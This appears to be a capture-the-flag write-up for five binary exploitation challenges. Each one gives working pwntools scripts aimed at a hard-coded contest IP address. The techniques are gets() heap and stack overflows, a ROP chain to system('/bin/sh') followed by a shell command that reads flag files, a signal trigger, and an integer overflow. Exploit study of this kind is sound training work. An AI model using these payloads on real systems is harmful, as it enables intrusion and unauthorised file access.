Pwn

Baby Hippo

Description

Solution

1. Find the vuln

• Binary uses gets() to read the password into chunkA + 0x14, adjacent chunkB contains a 4-byte magic. Overflow from chunkA → overwrite magic in chunkB.

1. Compute offset to magic

# derived from chunk sizes: next chunk ≈ chunkA_start + 0x50, password starts at chunkA+0x14
offset = 0x50 - 0x14   # -> 0x3c (60)

1. Craft payload to set magic = 0x1337beef (little-endian)

#!/usr/bin/env python3
from pwn import remote, p32
import sys, time

HOST = sys.argv[1] if len(sys.argv) > 1 else "188.166.183.187"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 34572

r = remote(HOST, PORT)
r.recv(timeout=0.5)            # read banner if any
r.sendline(b"tiger")          # username
payload = b"A" * 0x3c + p32(0x1337beef)  # short & clear
r.sendline(payload)
time.sleep(0.2)
print(r.recv(timeout=1).decode(errors="replace"))
r.close()

Flag

Rope or Hope

Description

Solution

1. Find the vuln

• vuln() reads user input into a small stack buffer (stack read of 0x100 into a 0x40 buffer) → stack buffer overflow. Binary is non-PIE, no stack canary, NX enabled → classic ROP is possible.

1. Compute offset to saved return

# from analysis / local debugging
offset = 72   # 0x48 bytes from buffer start to saved return

1. Useful gadgets and symbols (from the binary)

pop rdi; ret    = 0x401303
ret (alignment) = 0x401104
system@plt      = 0x4010a0
"/bin/sh"       = 0x404050   # symbol 'secret' in .data

1. Craft payload

#!/usr/bin/env python3
from pwn import *
import time

HOST = "188.166.183.187"
PORT = 33578

POP_RDI    = 0x401303
RET_ALIGN  = 0x401104
SYSTEM_PLT = 0x4010a0
SECRET     = 0x404050
OFFSET     = 72

context.arch = 'amd64'
context.log_level = 'info'

def build_payload():
    return b"A"*OFFSET + p64(POP_RDI) + p64(SECRET) + p64(RET_ALIGN) + p64(SYSTEM_PLT)

# Single builtin-only command: check several candidate paths and print the first readable file
BUILTIN_CHECK = (
    "sh -c 'for f in flag flag.txt /flag /root/flag /root/flag.txt ./flag ./flag.txt; do "
    "if [ -r \"$f\" ]; then while IFS= read -r L; do printf \"%s\\n\" \"$L\"; done < \"$f\"; break; fi; done'"
)

def main():
    p = remote(HOST, PORT, timeout=15)
    try:
        try:
            p.recvuntil(b"what's your name?", timeout=2)
        except Exception:
            pass

        p.sendline(build_payload())   # send ROP
        time.sleep(0.2)               # small pause for shell to spawn

        p.sendline(BUILTIN_CHECK)     # single command to find+print flag using shell builtins
        out = p.recv(timeout=2) or b""
        if out.strip():
            print(out.decode(errors='ignore'))
        else:
            print("[*] No output; dropping to interactive for manual checks.")
            p.interactive()
    finally:
        p.close()

if __name__ == "__main__":
    main()

Flag

Signal Interceptor

Description

Solution

1. Find the vuln

• The binary exposes a menu option that calls send_signal(signal_num) which ultimately does raise(signal_num). A signal handler for SIGALRM (signal 14) sets alarm_triggered and causes the program to open and print /home/ctf/flag

1. Key idea

• Trigger the SIGALRM handler by causing the program to raise signal 14 via the menu option.

1. What to send

# menu sequence
2      # choose "Send signal"
14     # SIGALRM
exploit# signal name (any string)
4      # exit (optional)

1. Craft payload

#!/usr/bin/env python3
from pwn import remote, context
import re, sys

context.log_level = 'info'   # change to 'debug' for more verbose comms
HOST = "188.166.183.187"
PORT = 34203

try:
    r = remote(HOST, PORT, timeout=6)
    # adjust recv keys if the menu text is slightly different
    try:
        r.recvuntil(b"Choice:", timeout=3)
    except Exception:
        # fallback to just small sleep + read
        pass

    r.sendline(b"2")                 # choose Send signal
    r.recvuntil(b"Enter signal number", timeout=3)
    r.sendline(b"14")                # SIGALRM
    r.recvuntil(b"Enter signal name:", timeout=3)
    r.sendline(b"exploit")           # name (arbitrary)

    # read what's left for a couple seconds
    data = r.recvrepeat(timeout=3).decode(errors="ignore")
    print(data)

    m = re.search(r"(GCTF25\{.*?\})", data)
    if m:
        flag = m.group(1)
        print("FOUND FLAG:", flag)
        with open("flag.txt","w") as f:
            f.write(flag + "\n")
        print("Saved to flag.txt")
    else:
        print("Flag pattern not found in response. Raw response saved to output.txt")
        with open("output.txt","w") as f:
            f.write(data)
    r.close()

except Exception as e:
    print("Connection/interaction failed:", e)
    sys.exit(1)

Flag

Flag: GCTF25{s1941ARm_34f8250fdea5_5i6naL_aLARm}

The Gatekeeper's Weakness

Description

Solution

1. Find the vuln

• The binary calls gets() into a 72-byte stack buffer inside gatekeeper().

• Saved EBP + return address lie right after the buffer, so we can overwrite the return address.

• A hidden win() function exists at 0x08049296, which prints the flag.

1. Compute offset to jump to win()

# 72 bytes buffer + 4 bytes saved EBP
offset = 72 + 4   # -> 76

1. Craft payload

#!/usr/bin/env python3
from pwn import *
import sys

# remote target
HOST = "188.166.183.187"
PORT = 33619

# Exploit specifics discovered earlier
OFFSET = 76                # bytes to saved return address (72 buffer + 4 saved EBP)
WIN_ADDR = 0x08049296      # address of win() in little-endian for 32-bit binary

def main():
    payload = b"A" * OFFSET + p32(WIN_ADDR)

    try:
        # connect to remote service
        print(f"[+] connecting to {HOST}:{PORT} ...")
        p = remote(HOST, PORT, timeout=10)

        # optionally read initial banner/prompt (nonfatal if times out)
        try:
            banner = p.recvuntil(b":", timeout=2)   # try to get a prompt ending with ":" (common)
            print("[<] banner/prompt:")
            print(banner.decode(errors="ignore"))
        except EOFError:
            pass
        except Exception:
            # fallback: try a short recv
            try:
                banner2 = p.recv(timeout=1)
                if banner2:
                    print("[<] banner:")
                    print(banner2.decode(errors="ignore"))
            except Exception:
                pass

        print(f"[+] sending payload ({len(payload)} bytes)")
        p.sendline(payload)

        # try to receive the response (flag). Wait up to 6 seconds for output.
        resp = p.recvall(timeout=6)
        if not resp:
            # maybe it didn't send everything yet; try interactive mode
            print("[!] no response received with recvall(timeout=6). Switching to interactive (press Ctrl+C to quit).")
            p.interactive()
        else:
            print("[<] response:")
            print(resp.decode(errors="ignore"))

        p.close()
    except Exception as e:
        print(f"[!] error: {e}")
        sys.exit(1)

if __name__ == "__main__":
    main()

Flag

The Shopkeeper's Math Error

Description

Solution

1. Find the vuln

• The program computes total = qty * price using 32-bit signed arithmetic. An overflow on the 32-bit multiply wraps modulo 2^32 and is then interpreted as a signed value. The code treats certain negative totals specially and prints the legendary/flag output.

1. Compute the magic qty to force a target signed total

We want signed total T = -2147483646 (observed in program output when an overflow happens).

Unsigned representation:
T_u = T & 0xffffffff = 2147483650

Solve (price * qty) ≡ T_u (mod 2^32).

For price = 50:
qty = T_u / 50 = 2147483650 / 50 = 42949673

1. Craft payload

#!/usr/bin/env python3
from pwn import remote, process
import re, math, time

HOST = "188.166.183.187"
PORT = 33627
USE_REMOTE = True

M = 2**32
TARGET = -2147483646  # signed total we want the 32-bit result to equal

def read_lazy(conn, timeout=0.5):
    out = b""
    try:
        out += conn.recv(timeout=timeout)
    except Exception:
        pass
    time.sleep(0.05)
    try:
        out += conn.recv(timeout=0.2)
    except Exception:
        pass
    return out

def open_conn():
    if USE_REMOTE:
        return remote(HOST, PORT, timeout=2)
    else:
        return process("./shopkeeper")

def send_choice_and_qty(conn, choice, qty=None):
    banner = read_lazy(conn)
    print(banner.decode(errors='ignore'), end='')
    conn.sendline(str(choice).encode())
    time.sleep(0.12)
    # try to receive prompt or rest
    try:
        out = conn.recv(timeout=1)
        print(out.decode(errors='ignore'), end='')
        if b"How many" in out or b"Quantity" in out:
            if qty is not None:
                conn.sendline(str(qty).encode())
                rest = conn.recvall(timeout=2)
                print(rest.decode(errors='ignore'), end='')
                return rest
    except Exception:
        pass
    try:
        rest = conn.recvall(timeout=1)
        print(rest.decode(errors='ignore'), end='')
        return rest
    except Exception:
        return b""

def signed_to_u32(x):
    return x & 0xffffffff

def compute_qty(price, target_signed):
    target_u = signed_to_u32(target_signed)
    g = math.gcd(price, M)
    if target_u % g != 0:
        return []
    price_p = price // g
    M_p = M // g
    target_p = target_u // g
    inv = pow(price_p, -1, M_p)
    q0 = (target_p * inv) % M_p
    return [q0, q0 + M_p]

def probe_price(choice=1):
    conn = open_conn()
    banner = read_lazy(conn)
    print(banner.decode(errors='ignore'), end='')
    conn.sendline(str(choice).encode())
    time.sleep(0.1)
    try:
        out = conn.recvall(timeout=1)
    except Exception:
        out = b""
    conn.close()
    m = re.search(rb"Total cost:\s*([-\d]+)\s*gold", out)
    if m:
        return abs(int(m.group(1)))
    return None

def main():
    price1 = probe_price(1) or 50
    print("[*] detected price1:", price1)
    # compute qty candidates
    cands = compute_qty(price1, TARGET)
    if not cands:
        print("[!] no solution for target")
        return
    print("[*] candidates:", cands[:2])
    # try smallest candidate(s)
    for q in cands:
        if q <= 0:
            continue
        print(f"[*] trying qty = {q}")
        conn = open_conn()
        send_choice_and_qty(conn, 1, q)
        conn.close()
        break

if __name__ == "__main__":
    main()

Flag